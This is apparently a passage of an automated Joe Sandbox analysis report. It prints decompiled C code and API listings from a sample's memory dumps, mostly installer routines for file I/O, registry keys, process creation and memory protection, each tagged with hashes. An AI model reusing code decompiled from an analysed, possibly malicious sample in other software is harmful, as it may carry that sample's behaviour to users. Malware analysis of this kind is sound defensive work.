                                                            				_t53 = E73C21BC4();
                                                            				_v8 = _t53;
                                                            				_t72 = _t28;
                                                            				_push(_t65 + _t53 * _t72);
                                                            				_t64 = E73C21C27();
                                                            				_t80 = E73C21C23();
                                                            				_t83 = E73C21BC8();
                                                            				_t58 = _t72;
                                                            				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
                                                            					_push( *((intOrPtr*)(_t58 + _t64)));
                                                            				}
                                                            				_push( *((intOrPtr*)(_t58 + _t80)));
                                                            				asm("loop 0xfffffff1");
                                                            				goto L9;
                                                            			}


























                                                            APIs
                                                            • CreateFileA.KERNELBASE(?), ref: 73C22C83
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: e65fffba89169d0d0569e33a87830f938cc2f4224b472d100bc4b2f5a8c2f043
                                                            • Instruction ID: dd97bce0810672c09a54bb535b83c77cf31d308ef2fb7cabea798c522d789d52
                                                            • Opcode Fuzzy Hash: e65fffba89169d0d0569e33a87830f938cc2f4224b472d100bc4b2f5a8c2f043
                                                            • Instruction Fuzzy Hash: 304180F6900348EFEB00EF65DD84B5ABFB5EB14366F314429E608CE251DA35D954CB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00402675(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                            				intOrPtr _t27;
                                                            				intOrPtr _t33;
                                                            				void* _t38;
                                                            				void* _t41;
                                                            
                                                            				_t33 = __edx;
                                                            				 *((intOrPtr*)(_t38 - 8)) = __ebx;
                                                            				_t27 = E00402C17(2);
                                                            				_t41 = _t27 - 1;
                                                            				 *((intOrPtr*)(_t38 - 0x38)) = _t33;
                                                            				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
                                                            				if(_t41 < 0) {
                                                            					L24:
                                                            					 *0x4524a8 =  *0x4524a8 +  *(_t38 - 4);
                                                            				} else {
                                                            					__ecx = 0x1fff;
                                                            					if(__eax > 0x1fff) {
                                                            						 *((intOrPtr*)(__ebp - 0xc)) = 0x1fff;
                                                            					}
                                                            					if( *__esi == __bl) {
                                                            						L21:
                                                            						__esi =  *((intOrPtr*)(__ebp - 8));
                                                            						goto L22;
                                                            					} else {
                                                            						 *((char*)(__ebp + 0xb)) = __bl;
                                                            						 *(__ebp - 0x30) = E004061CE(__ecx, __esi);
                                                            						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
                                                            							goto L21;
                                                            						} else {
                                                            							__esi =  *((intOrPtr*)(__ebp - 8));
                                                            							while(1) {
                                                            								__eax = __ebp - 0xd;
                                                            								__eax = E00405E62( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
                                                            								if(__eax == 0) {
                                                            									break;
                                                            								}
                                                            								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
                                                            									 *(__ebp - 0xd) & 0x000000ff = E004061B5(__edi,  *(__ebp - 0xd) & 0x000000ff);
                                                            								} else {
                                                            									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
                                                            										__al =  *(__ebp - 0xd);
                                                            										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
                                                            											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
                                                            										} else {
                                                            											 *((char*)(__esi + __edi)) = __al;
                                                            											__esi = __esi + 1;
                                                            										}
                                                            										break;
                                                            									} else {
                                                            										__al =  *(__ebp - 0xd);
                                                            										 *((char*)(__esi + __edi)) = __al;
                                                            										__esi = __esi + 1;
                                                            										 *((char*)(__ebp + 0xb)) = __al;
                                                            										if(__al == __bl) {
                                                            											break;
                                                            										} else {
                                                            											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
                                                            												continue;
                                                            											} else {
                                                            												break;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            								goto L25;
                                                            							}
                                                            							L22:
                                                            							 *((char*)(__esi + __edi)) = __bl;
                                                            							if(_t41 == 0) {
                                                            								 *(_t38 - 4) = 1;
                                                            							}
                                                            							goto L24;
                                                            						}
                                                            					}
                                                            				}
                                                            				L25:
                                                            				return 0;
                                                            			}








                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: wsprintf
                                                            • String ID:
                                                            • API String ID: 2111968516-0
                                                            • Opcode ID: d97f9e7506a49f2a05a921778084f7980db9dc2b953e44158ed944f486982c36
                                                            • Instruction ID: 782d261d89be0bc1b18a11b4e535025141ccc8d289159bbcedea1472c154a4d0
                                                            • Opcode Fuzzy Hash: d97f9e7506a49f2a05a921778084f7980db9dc2b953e44158ed944f486982c36
                                                            • Instruction Fuzzy Hash: 2321F730C04289BEDF328F9886485AEBBB49F45314F14447FE491B73D2D6BD8985CB2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 40%
                                                            			E00402733(intOrPtr __edx, void* __eflags) {
                                                            				long _t7;
                                                            				long _t9;
                                                            				LONG* _t11;
                                                            				void* _t13;
                                                            				intOrPtr _t14;
                                                            				void* _t17;
                                                            				void* _t19;
                                                            
                                                            				_t14 = __edx;
                                                            				_push(ds);
                                                            				if(__eflags != 0) {
                                                            					_t7 = E00402C17(2);
                                                            					_pop(_t13);
                                                            					 *((intOrPtr*)(_t19 - 0x38)) = _t14;
                                                            					_t9 = SetFilePointer(E004061CE(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
                                                            					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
                                                            						_push(_t9);
                                                            						E004061B5();
                                                            					}
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t19 - 4));
                                                            				return 0;
                                                            			}











                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402751
                                                              • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FilePointerwsprintf
                                                            • String ID:
                                                            • API String ID: 327478801-0
                                                            • Opcode ID: 07574b4eec459b89e3c9016d49a80b1f7a586a3dff9f977a09ac077d2d2bcedb
                                                            • Instruction ID: 0afbb9a68c7e6de16fd8fdbcd45b0e83c324d239dd732ad329437b7c16d25a86
                                                            • Opcode Fuzzy Hash: 07574b4eec459b89e3c9016d49a80b1f7a586a3dff9f977a09ac077d2d2bcedb
                                                            • Instruction Fuzzy Hash: 97E09271A00104BFD700EB94AF898AE7769DB85314B24043BF102F50C1DA7848518A3D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004023A4(int __eax, CHAR* __ebx) {
                                                            				CHAR* _t11;
                                                            				void* _t13;
                                                            				CHAR* _t14;
                                                            				void* _t18;
                                                            				int _t22;
                                                            
                                                            				_t11 = __ebx;
                                                            				_t5 = __eax;
                                                            				_t14 = 0;
                                                            				if(__eax != __ebx) {
                                                            					__eax = E00402C39(__ebx);
                                                            				}
                                                            				if(_t13 != _t11) {
                                                            					_t14 = E00402C39(0x11);
                                                            				}
                                                            				if( *((intOrPtr*)(_t18 - 0x18)) != _t11) {
                                                            					_t11 = E00402C39(0x22);
                                                            				}
                                                            				_t5 = WritePrivateProfileStringA(0, _t14, _t11, E00402C39(0xffffffcd)); // executed
                                                            				_t22 = _t5;
                                                            				if(_t22 == 0) {
                                                            					 *((intOrPtr*)(_t18 - 4)) = 1;
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t18 - 4));
                                                            				return 0;
                                                            			}









                                                            APIs
                                                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 004023DD
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileStringWrite
                                                            • String ID:
                                                            • API String ID: 390214022-0
                                                            • Opcode ID: f7546b57c2d88294b794a0ce81ec9b16f8aeca243a3d815bd59fa4cac4068163
                                                            • Instruction ID: f0bce9e42b5e283f9075ac1063ffb1f66a35e0649843f6992b50a90661d40e1e
                                                            • Opcode Fuzzy Hash: f7546b57c2d88294b794a0ce81ec9b16f8aeca243a3d815bd59fa4cac4068163
                                                            • Instruction Fuzzy Hash: 8BE04831604128ABE7203EF21F8D97F10989B84304B64053FBA01B61C2D9FD4C4242A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040610B(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                                            				void* _t7;
                                                            				long _t8;
                                                            				void* _t9;
                                                            
                                                            				_t7 = E0040605C(_a4,  &_a12);
                                                            				if(_t7 != 0) {
                                                            					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                            					return _t8;
                                                            				}
                                                            				_t9 = 6;
                                                            				return _t9;
                                                            			}







                                                            APIs
                                                            • RegCreateKeyExA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 00406134
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405E62(void* _a4, void* _a8, long _a12) {
                                                            				int _t7;
                                                            				long _t11;
                                                            
                                                            				_t11 = _a12;
                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                            					return 0;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}






                                                            APIs
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405E76
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00405E91(void* _a4, void* _a8, long _a12) {
                                                            				int _t7;
                                                            				long _t11;
                                                            
                                                            				_t11 = _a12;
                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                            					return 0;
                                                            				} else {
                                                            					return 1;
                                                            				}
                                                            			}






                                                            APIs
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405EA5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                            
                                                            				 *0x73c25014 = _a4;
                                                            				if(_a8 == 1) {
                                                            					VirtualProtect(0x73c2501c, 4, 0x40, 0x73c25034); // executed
                                                            					 *0x73c2501c = 0xc2;
                                                            					 *0x73c25034 = 0;
                                                            					 *0x73c25030 = 0;
                                                            					 *0x73c2502c = 0;
                                                            					 *0x73c25028 = 0;
                                                            					 *0x73c25024 = 0;
                                                            					 *0x73c25020 = 0;
                                                            					 *0x73c2501e = 0;
                                                            				}
                                                            				return 1;
                                                            			}




                                                            APIs
                                                            • VirtualProtect.KERNELBASE(73C2501C,00000004,00000040,73C25034), ref: 73C219E5
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004060DD(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                                            				void* _t7;
                                                            				long _t8;
                                                            				void* _t9;
                                                            
                                                            				_t7 = E0040605C(_a4,  &_a12);
                                                            				if(_t7 != 0) {
                                                            					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
                                                            					return _t8;
                                                            				}
                                                            				_t9 = 6;
                                                            				return _t9;
                                                            			}







                                                            APIs
                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,?,?), ref: 00406101
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040159D() {
                                                            				int _t5;
                                                            				void* _t11;
                                                            				int _t14;
                                                            
                                                            				_t5 = SetFileAttributesA(E00402C39(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                            				_t14 = _t5;
                                                            				if(_t14 == 0) {
                                                            					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t11 - 4));
                                                            				return 0;
                                                            			}







                                                            APIs
                                                            • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004042D4(intOrPtr _a12) {
                                                            				intOrPtr _v0;
                                                            				struct HWND__* _v4;
                                                            				int _t7;
                                                            				void* _t8;
                                                            				void* _t9;
                                                            				void* _t10;
                                                            
                                                            				_t7 = SetDlgItemTextA(_v4, _v0 + 0x3e8, E004062EA(_t8, _t9, _t10, 0, _a12)); // executed
                                                            				return _t7;
                                                            			}









                                                            0x004042ee
                                                            0x004042f3

                                                            APIs
                                                            • SetDlgItemTextA.USER32(?,?,00000000), ref: 004042EE
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ItemText
                                                            • String ID:
                                                            • API String ID: 3367045223-0
                                                            • Opcode ID: a7ccc5f13d7a9dd03b49f03cec007a1df0ae89502798fe29fb091b2ebe8b6ea7
                                                            • Instruction ID: 22e3c99022c4b401909cfeccc5f53fcf3645d9aba18eb3be6cde127aefdf9dc7
                                                            • Opcode Fuzzy Hash: a7ccc5f13d7a9dd03b49f03cec007a1df0ae89502798fe29fb091b2ebe8b6ea7
                                                            • Instruction Fuzzy Hash: 26C04C75548200BFD641B755CC42F1FB799EFA432AF00C52EB15DA11D1C635C8209A2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404320(int _a4) {
                                                            				struct HWND__* _t2;
                                                            				long _t3;
                                                            
                                                            				_t2 =  *0x44e3f8;
                                                            				if(_t2 != 0) {
                                                            					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
                                                            					return _t3;
                                                            				}
                                                            				return _t2;
                                                            			}






                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: f50e63b132b24878aef5dc53f281ae586e67706c8815a59119a5f52f37cdf5c1
                                                            • Instruction ID: f33369c0959fc2f31fb2d94020f8cc99ded583a01a7fd26deb419bde1f84e5de
                                                            • Opcode Fuzzy Hash: f50e63b132b24878aef5dc53f281ae586e67706c8815a59119a5f52f37cdf5c1
                                                            • Instruction Fuzzy Hash: 52C09B757447017FEA159F619D45F077798B760B01F1544397750F70D0C674D410D61C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040336B(long _a4) {
                                                            				long _t2;
                                                            
                                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                            				return _t2;
                                                            			}




                                                            0x00403379
                                                            0x0040337f

                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00403379
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                            • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                            • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                            • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00404309(int _a4) {
                                                            				long _t2;
                                                            
                                                            				_t2 = SendMessageA( *0x452428, 0x28, _a4, 1); // executed
                                                            				return _t2;
                                                            			}




                                                            0x00404317
                                                            0x0040431d

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: c30535afd169c14e8b4d040e998dc10ef2daf8ec42941babfa575ffd1ce924aa
                                                            • Instruction ID: 9ea9f7192fe415255892c7c1483d18bd9fbebf719f850706ff9b0d6542640036
                                                            • Opcode Fuzzy Hash: c30535afd169c14e8b4d040e998dc10ef2daf8ec42941babfa575ffd1ce924aa
                                                            • Instruction Fuzzy Hash: E5B09236184A00ABDA124B10DE09F497A62A769702F008029B240250B0CAB240A0EB28
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004042F6(int _a4) {
                                                            				int _t2;
                                                            
                                                            				_t2 = EnableWindow( *0x43c08c, _a4); // executed
                                                            				return _t2;
                                                            			}




                                                            0x00404300
                                                            0x00404306

                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,004040D2), ref: 00404300
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: 85b1628437d6bc2e0a85985499539ad5df80abf1265e93d00aa480f3fdb0d289
                                                            • Instruction ID: 9ba761fd450edde39ad44ae3507cba1171b2616f218c63448c15d7f08a3949a3
                                                            • Opcode Fuzzy Hash: 85b1628437d6bc2e0a85985499539ad5df80abf1265e93d00aa480f3fdb0d289
                                                            • Instruction Fuzzy Hash: 87A00275444540DBCB055B50EF44D067B71A794701711D579A1459103487715460EB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E00401F7B() {
                                                            				void* _t8;
                                                            				void* _t12;
                                                            				void* _t14;
                                                            				void* _t16;
                                                            				void* _t17;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            
                                                            				_t19 = E00402C39(_t14);
                                                            				E00405378(0xffffffeb, _t6); // executed
                                                            				_t8 = E004058F0(_t19); // executed
                                                            				_t20 = _t8;
                                                            				if(_t20 == _t14) {
                                                            					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                            				} else {
                                                            					if( *((intOrPtr*)(_t22 - 0x20)) != _t14) {
                                                            						_t12 = E004066D8(_t16, _t20);
                                                            						if( *((intOrPtr*)(_t22 - 0x24)) < _t14) {
                                                            							if(_t12 != _t14) {
                                                            								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                            							}
                                                            						} else {
                                                            							E004061B5(_t17, _t12);
                                                            						}
                                                            					}
                                                            					_push(_t20);
                                                            					CloseHandle();
                                                            				}
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t22 - 4));
                                                            				return 0;
                                                            			}











                                                            APIs
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,0040329E,0040329E,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsx1ED8.tmp\System.dll), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                              • Part of subcall function 004058F0: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00448098,00000009), ref: 00405919
                                                              • Part of subcall function 004058F0: CloseHandle.KERNEL32(?), ref: 00405926
                                                            • CloseHandle.KERNEL32(?), ref: 00401FC0
                                                              • Part of subcall function 004066D8: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E9
                                                              • Part of subcall function 004066D8: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670B
                                                              • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                            • String ID:
                                                            • API String ID: 2972824698-0
                                                            • Opcode ID: baf91f1c6fac4f5a34fe9a03cbd9f3c9fe76fbf55e55d4b783b403db7f4f4d73
                                                            • Instruction ID: eeb5512819bcec06601acf2d49d3b73d03ea50ea89893d791cfc8d8d466688d4
                                                            • Opcode Fuzzy Hash: baf91f1c6fac4f5a34fe9a03cbd9f3c9fe76fbf55e55d4b783b403db7f4f4d73
                                                            • Instruction Fuzzy Hash: 0FF0BB32905221DBCB20BFA54E88CEFB2A59F05314B24463FF502B21D1C77C4D415A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E004014D6(intOrPtr __edx) {
                                                            				long _t3;
                                                            				void* _t7;
                                                            				intOrPtr _t10;
                                                            				void* _t13;
                                                            
                                                            				_t10 = __edx;
                                                            				_t3 = E00402C17(_t7);
                                                            				 *((intOrPtr*)(_t13 - 0x38)) = _t10;
                                                            				if(_t3 <= 1) {
                                                            					_t3 = 1;
                                                            				}
                                                            				Sleep(_t3); // executed
                                                            				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t13 - 4));
                                                            				return 0;
                                                            			}








                                                            APIs
                                                            • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: c119c5b23c4e7d85942e5466de7459b5dc7c2978c118f2848ef78bda966c211a
                                                            • Instruction ID: 8a2e161516ab7e1e90c22bd31bd3d3ce098b98b7261b484d2c6ea91aeb26b437
                                                            • Opcode Fuzzy Hash: c119c5b23c4e7d85942e5466de7459b5dc7c2978c118f2848ef78bda966c211a
                                                            • Instruction Fuzzy Hash: 3FD05E73A242009BD710DBB8BAC545E73A8E7813253308837E102F2091EA78C8418A38
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E73C212C6() {
                                                            				void* _t1;
                                                            
                                                            				_t1 = GlobalAlloc(0x40,  *0x73c25040); // executed
                                                            				return _t1;
                                                            			}





                                                            APIs
                                                            • GlobalAlloc.KERNELBASE(00000040,73C211C4,-000000A0), ref: 73C212CE
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID:
                                                            • API String ID: 3761449716-0
                                                            • Opcode ID: f88dc9d0528d76b3c231bbae570a45abb965b0c6ac03a80ab392732e58e35e86
                                                            • Instruction ID: fe8951b7d71ed542aed00a0b4bc1995700da3f6b982137bbff26964831af8b5f
                                                            • Opcode Fuzzy Hash: f88dc9d0528d76b3c231bbae570a45abb965b0c6ac03a80ab392732e58e35e86
                                                            • Instruction Fuzzy Hash: 61A002B35601909BDF41FB92AD1EF297A21B764702F741044E30D6D0928AB90850DF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 78%
                                                            			E00404766(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                            				signed int _v8;
                                                            				signed int _v12;
                                                            				long _v16;
                                                            				long _v20;
                                                            				long _v24;
                                                            				char _v28;
                                                            				intOrPtr _v32;
                                                            				long _v36;
                                                            				char _v40;
                                                            				unsigned int _v44;
                                                            				signed int _v48;
                                                            				CHAR* _v56;
                                                            				intOrPtr _v60;
                                                            				intOrPtr _v64;
                                                            				intOrPtr _v68;
                                                            				CHAR* _v72;
                                                            				void _v76;
                                                            				struct HWND__* _v80;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t82;
                                                            				long _t87;
                                                            				signed char* _t89;
                                                            				void* _t95;
